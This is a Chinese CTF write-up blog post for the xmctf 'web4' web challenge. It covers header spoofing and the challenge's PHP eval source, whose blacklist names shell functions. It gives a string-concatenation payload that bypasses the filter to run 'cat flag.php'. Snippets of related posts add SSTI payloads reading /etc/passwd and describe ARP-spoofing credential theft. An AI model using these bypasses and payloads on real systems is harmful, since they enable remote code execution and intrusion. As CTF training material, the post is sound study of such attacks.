xmctf-web-web4-wp

最新推荐文章于 2021-08-12 21:26:21 发布
最新推荐文章于 2021-08-12 21:26:21 发布
阅读量195 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118216979
版权

web4

好几个四季了,我在等我的主人回来
key:e086aa137fa19f67d27b39d0eca18610

key扔cmd5解出1.1.1.1,可能为IP地址,放到请求头

X-Forwarded-For: 1.1.1.1

提示存在dhudndrgrhs.php,访问得到源代码

源代码

<?php
show_source(__FILE__);
error_reporting(0);
$disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$disable_fun = array_merge($disable_fun, get_defined_functions()['internal']);
foreach($disable_fun as $i){
    if(stristr($_GET[shell], $i)!==false){
        die('xmctf');
    }
}
eval($_GET[shell]);
函数描述
array_merge()合并一个或多个数组
get_defined_functions()返回所有已定义函数的数组
stristr ( string $haystack , mixed $needle , bool $before_needle = false ) : string返回 haystack 字符串从 needle 第一次出现的位置开始到结尾的字符串。

绕过

payload

#拼接变量
$a=sys;$b=tem;$c=$a.$b;$d='cat flag.php';$c($d);
居上7788
关注
专栏目录
southerose.github.io
04-02
欢迎来到GitHub Pages 您可以使用的来维护和预览Markdown文件中网站的内容。 每当您提交到该存储库时,GitHub Pages都将运行从Markdown文件中的内容重建站点中的页面。 降价促销 Markdown是一种轻巧且易于使用的语法,可用于样式化您的文字。 它包括以下约定 Syntax highlighted code block # Header 1 ## Header 2 ### Header 3 - Bulleted - List 1. Numbered 2. List **Bold** and _Italic_ and `Code` text [ Link ](url) and ![ Image ](src) 有关更多详细信息,请参见 。 吉柯主题 您的Pages网站将使用您在选择的Jekyll主题的布局和样式。 该主题的名称保存在Jekyll _conf
xmctf-web-easy-web-wp
居上
06-25 159
easy-web 源代码 源代码贴上,如下: <?php show_source(__FILE__); $key = "bad"; extract($_POST); if($key === 'bad'){ die('badbad!!!'); } $act = @$_GET['act']; $arg = @$_GET['arg']; if(preg_match('/^[a-z0-9_]*$/isD',$act)) { echo 'check'; } else { $act($a
xmctf-web-web11-wp
居上
06-25 106
web11 后端仍然使用的是flask,然后同时也存在SSTI。但是过滤了一些字符。 经过fuzz之后发现过滤了一些字符如 . _ arg payload #get传入 ?name={{ ()|attr(request['values']['x1'])|attr(request['values']['x2'])| attr(request['values']['x3'])()|attr(request['values']['x6'])(233)| attr(request['values']['x4'])|
xmctf-web-web8-wp
居上
06-25 298
web8 考点 SSTI flask 根据提示,需要以admin的方式访问flag。携带当前session访问flag不能成功的。 传参数name={{7*7}},发现是SSTI。 然后传参?name={{config}}可以查看到,secret_key 后端使用的是flash框架。 先安装pip install flask-unsign[wordlist] 。 然后在浏览器中复制当前session flask-unsign --decode --cookie "eyJ1c2VybmFtZSI
xmctf web4-考核
羽的博客
07-07 1384
web4-考核 根据提示key:e086aa137fa19f67d27b39d0eca18610猜测为md5值,解密得到1.1.1.1 在请求头中添加 X-Forwarded-For:1.1.1.1得到一个地址dhudndrgrhs.php内容如下 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir",
buuoj、xmctf、攻防世界刷题(web)write up
热门推荐
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
xmctf web11-考核(模板注入绕过)
羽的博客
06-27 927
web11-考核(模板注入绕过) 输入name=1发现存在回显,猜测为模板注入,经过测试发现过滤了 . _ 和一些关键字 py2模板注入常见payload ().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read() ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").
xmctf web3-考核
Sk1y的博客
08-12 157
php session工作原理,session反序列化。
XMCTF内部赛 part1
羽的博客
07-07 2121
web3-考核 <?php highlight_file(__FILE__); $content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : ""; $name = @$_GET['name'] ? $_GET['name'] : ''; str_replace('/', '', $name); str_replace('\\', '', $name); file_put_contents("/tmp/" . $na
xmctf web12-考核(无参数RCE)
羽的博客
07-07 1379
web12-考核 无参数RCE <?php header("Content-Type: text/html;charset=utf-8"); include "flag.php"; echo "flag在哪里呢?<br>"; highlight_file(__FILE__); error_reporting(0); if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//
信安冬令营实训报告(信息收集,主机渗透,内网渗透)
居上
07-03 932
文章目录一丶摘要二丶实训内容实验一*信息收集Nmap目标主机发现端口扫描开放服务和操作系统检测脚本扫描其他Nessus目标开启服务进入扫描界面使用高级扫描扫描win7其他实验二*主机渗透Metasploit目标启动搜索模块使用模块查看选项设置参数运行模块命令执行其他实验三*内网渗透ARP欺骗目标组网在Win7上安装foxmail安装netwox伪造身份Wireshark抓取流量其他三、测试结果发现的问题四、安全建议关于防护永恒之蓝漏洞的建议关于防护局域网ARP欺骗的建议其他建议 一丶摘要 在XXX冬令营2
PHP探针
weixin_34294649的博客
06-11 119
2019独角兽企业重金招聘Python工程师标准>>> ...
arp欺骗窃取foxmail中的登陆名和密码
居上
07-03 389
ARP欺骗 目标 Kali充当中间人,捕获用户在Win7上使用Foxmail时收发邮件的数据包,并窃取登录名和授权码 组网 组建局域网(NAT模式下) VM_Kali(充当中间人) IP:192.168.140.129 MAC:00:0C:29:FB:07:11 VM_Win7 IP:192.168.140.144 MAC:00:0C:29:D6:6D:1B 真实机 IP:192.168.140.1 MAC:00:50:56:C0:00:08 在Win7上安装foxmai
DC靶机渗透系列(DC1-DC3)
居上
07-01 791
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3648
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
buuctf-web-[强网杯 2019]随便注-wp
居上
06-22 1425
[强网杯 2019]随便注 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 1059
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
buuctf-misc-qr-wp
居上
06-21 750
qr 知识点 工具QR Research的使用 过程 使用QR Research得到flag
buuctf-misc-镜子里面的世界-wp
居上
06-21 691
镜子里面的世界 知识点 stegsolve分析图片通道 stegsolve=>Date Extract提取对应通道内容 过程 red plane 0、green plane 0、blue plane 0通道被黑色遮挡,data extract 发现flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值